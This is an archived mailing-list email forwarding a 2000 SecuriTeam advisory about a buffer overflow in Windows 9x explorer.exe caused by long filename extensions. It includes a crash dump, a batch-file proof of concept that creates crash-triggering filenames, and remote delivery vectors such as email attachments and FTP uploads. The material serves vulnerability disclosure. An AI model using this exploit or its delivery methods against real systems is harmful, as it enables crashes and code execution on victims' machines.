[iwar] FW: [EXPL] Windows 9x's explorer.exe contains a buffer overflow (long filenames)

From: Robert W. Miller
To: ,
From: snooker@iex.net
To: htcc@onelist.com
Sun, 22 Apr 2001 18:16:16 -0600
Messages sorted by: [ date ][ subject ][ author ][ recipient ]
Next message: From: Fred Cohen To: "[iwar] News"
Previous message: From: Fred Cohen To: "[iwar] News"
fc  Sat Apr 22 17:17:13 2000
Received: from 207.222.214.225
	by localhost with POP3 (fetchmail-5.1.0)
	for fc@localhost (single-drop); Sat, 22 Apr 2000 17:17:13 -0700 (PDT)
Received: by multi33.netcomi.com for fc
 (with Netcom Interactive pop3d (v1.21.1 1998/05/07) Sun Apr 23 00:17:08 2000)
X-From_: sentto-279987-308-fc=all.net@returns.onelist.com  Sat Apr 22 19:16:59 2000
Received: from hk.egroups.com (hk.egroups.com [208.50.144.91]) by multi33.netcomi.com (8.8.5/8.7.4) with SMTP id TAA12613 for ; Sat, 22 Apr 2000 19:16:59 -0500
X-eGroups-Return: sentto-279987-308-fc=all.net@returns.onelist.com
Received: from [10.1.10.38] by hk.egroups.com with NNFMP; 23 Apr 2000 00:17:03 -0000
Received: (qmail 31856 invoked from network); 23 Apr 2000 00:17:02 -0000
Received: from unknown (10.1.10.26) by m4.onelist.org with QMQP; 23 Apr 2000 00:17:02 -0000
Received: from unknown (HELO mail.iex.net) (192.156.196.5) by mta1 with SMTP; 23 Apr 2000 00:17:02 -0000
Received: from oemcomputer (p9-s8.cos1-ras.iex.net [209.151.65.105]) by mail.iex.net (8.9.1/8.9.1) with SMTP id SAA26935; Sat, 22 Apr 2000 18:06:49 -0600 (MDT)
To: , 
Message-ID: 
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
From: "Robert W. Miller" 
MIME-Version: 1.0
Mailing-List: list iwar@egroups.com; contact iwar-owner@egroups.com
Delivered-To: mailing list iwar@egroups.com
Precedence: bulk
List-Unsubscribe: 
Date: Sun, 22 Apr 2001 18:16:16 -0600
Reply-To: iwar@egroups.com
Subject: [iwar] FW: [EXPL] Windows 9x's explorer.exe contains a buffer overflow (long filenames)
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

The following security advisory is sent to the securiteam mailing
list, and can be found at the SecuriTeam web site:
http://www.securiteam.com

Windows 9x's explorer.exe contains a buffer overflow (long filenames)
---------------------------------------------------------------
SUMMARY

When Microsoft Windows explorer tries to access a filename that
contains
more than 129 chars in the extension, a buffer overflow will occur,
this
buffer overflow can be exploited to run arbitrary code. Since Explorer
is
used by many products as a shell, this vulnerability can be exploited
remotely.

DETAILS

Vulnerable systems:
Windows 95
Windows 98
Windows 98 Second Edition

When Explorer tries to access a filename that contains more than 129
chars
in the extension, a buffer will overflow and you will get an error
similar
to this:

EXPLORER caused an invalid page fault in
module  at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:

Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161

As you can notice, the EIP was overwritten during this overflow, this
means we can execute code from in the filename.

We can use 247 + 129 + 118 bytes to store data for some shell code. If
you
also add some extra special characters to the file, you can cause it
to be
recognized as write only in windows (and not found in DOS).

Exploit:
A) Creating such a file

place the following code in a .bat file:

---- cut here

echo This will create a file that when clicked upon in windows
echo explorer or any other program that calls explorer.exe for
echo file management will cause a buffer overflow.

dir *.* > _ . ------Buffer
overflow-----------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

echo This will cause a Blue screen of death
echo Just to show you it is possible to execute remote code.
echo (all it does is overwrite the return address with a false one.)

dir *.* >
_ . ------Blue-screen-of-death------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa12345678AAAAAAA
AAA

--- cut here

now run the .bat file

B) Using this bug on remote computers:

Eudora Pro mail client:
 You could attach the file to an e-mail and send this e-mail to  an
unsuspected computer user. When he checks his e-mail an the   mail
program
attempts to save the attachment to disk, the program will crash cause
due
to a buffer overflow.

EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
Stack dump:

FTP Upload, HTTP Download or DCC Sends :
Uploading a file with this name to an FTP server, or placing it in
some
HTTP server available for download, will enable an attacker to spread
this
file (that can contain arbitrary code) around. An attacker can also
use
remote sites' automatic file integrity checks (after a file is
uploaded)
to compromise a remote site.


ADDITIONAL INFORMATION

The information was provided by:  
Zoa_Chien.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email
to: list-subscribe@securiteam.com
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty
of any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits
or special damages.

Det. Robert W. Miller
Colorado Internet Crimes Against
Children Task Force
Pueblo High Tech. Crime Unit
Pueblo County Sheriff's Office
320 S. Joe Martinez Blvd.
Pueblo West, CO. 81007
Tel (719)583-4736
FAX (719)583-4732
mailto:snooker@iex.net
mailto:cicactf@iex.net
http://www.co.pueblo.co.us/sheriff/
PGP key available at: http://pgpkeys.mit.edu:11371/
search on snooker@iex.net





------------------------------------------------------------------------
Your high school sweetheart-where is he now?  With 4.4 million alumni
already registered at Classmates.com, there's a good chance you'll
find her here. Visit your online high school class reunion at:
http://click.egroups.com/1/3139/7/_/595019/_/956449023/
------------------------------------------------------------------------

------------------
http://all.net/
Next message: From: Fred Cohen To: "[iwar] News"
Previous message: From: Fred Cohen To: "[iwar] News"